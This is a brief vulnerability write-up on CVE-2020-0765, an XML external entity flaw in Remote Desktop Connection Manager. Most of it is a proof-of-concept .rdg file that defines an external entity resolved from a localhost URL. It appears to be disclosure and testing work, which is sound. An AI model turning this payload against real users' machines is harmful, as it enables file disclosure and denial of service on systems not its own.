CVE-2020-0765: Quick proof of concept

Published

Remote Desktop Connection Manager (RDCMan) spins up ancient XmlReader and XmlTextReader instances without considering DTD and entity handling, resulting in a bag of information disclosure (and denial of service) vulnerabilities. Here's a quick .rdg I put together to test against.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT file (#PCDATA)>
<!ENTITY foo SYSTEM "http://localhost:11223/">
]>

<RDCMan programVersion="2.7" schemaVersion="3">
<file>
<credentialsProfiles />
<properties>
<expanded>True</expanded>
<name>test</name>
<junk>&foo;</junk>
</properties>
<server>
<properties>
<name>test</name>
</properties>
</server>
</file>
<connected />
<favorites />
<recentlyUsed />
</RDCMan>